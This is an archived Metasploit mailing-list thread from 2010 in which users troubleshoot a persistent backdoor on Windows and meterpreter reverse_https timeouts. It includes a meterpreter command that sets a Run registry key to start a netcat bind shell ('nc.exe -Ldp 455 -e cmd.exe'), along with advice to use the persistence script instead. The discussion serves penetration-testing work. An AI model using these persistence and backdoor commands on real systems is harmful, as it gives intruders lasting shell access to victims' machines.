Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Persistent Backdoor

From: Miguel Rios <miguelrios35 () yahoo com>
Date: Sun, 10 Oct 2010 07:52:04 -0700 (PDT)
Hi,

Yeah I noticed the same behavior with reverse_https lately, which is why I'm using reverse_tcp for now. Reverse_https 
used to work very well but now I also get the timeout issue after it starts sending the initial stage. Sorry I can't 
really help. I can only confirm I'm getting the same issue with that payload, independently if its persistent or not.

cheers

--- On Sat, 10/9/10, Tom Van de Wiele <tom.vandewiele () gmail com> wrote:

From: Tom Van de Wiele <tom.vandewiele () gmail com>
Subject: Re: [framework] Persistent Backdoor
To: "framework" <framework () spool metasploit com>
Date: Saturday, October 9, 2010, 9:09 PM

Hi,
Sort of dropping into this thread, my apologies. Persistence.rb is really recommended instead of setting regkeys 
individually. Unless the victim has checks for the regkeys set by persistence.rb ofcourse. I have a little issue with 
it, in that it runs great with e.g. a windows/meterpreter/reverse_tcp payload but has anyone experienced problems with 
running it with a windows/meterpreter/reverse_https payload? I'm doing a file format client directed attack with 
another box as an exploit/multi/handler and on that box I see the reverse connection coming in from the victim to my 
multi/handler. I see a tcp handshake being performed but then no data being sent by the victim. After which the 
connection times out. I'm using reverse_https with 443/tcp as the client connecting back has to traverse a proxy 
server. I have tried this in another testlab with no proxy server in between (2 machines sitting in the same lan) but I 
get the same behavior. Using
 ruby1.9.1 and build svn r10585 from 2 days ago.


Thank you for sharing your experiences or any pointers on how I can diagnose this further.


On Mon, Oct 4, 2010 at 3:40 PM, David Kennedy <kennedyd013 () gmail com> wrote:


Why not use run persistence from meterpreter?
On Oct 4, 2010 9:36 AM, "Eric" <dkn4a1 () gmail com> wrote:

Hi,

meterpreter > reg setval -k




HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d



"C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe"
nor
meterpreter > reg setval -k
HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d
"C:\\windows\\system32\\nc.exe -Ldp 455 -e cmd.exe"






doesn't seem to work for me :-(
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework






_______________________________________________

https://mail.metasploit.com/mailman/listinfo/framework





-----Inline Attachment Follows-----

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework



      
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: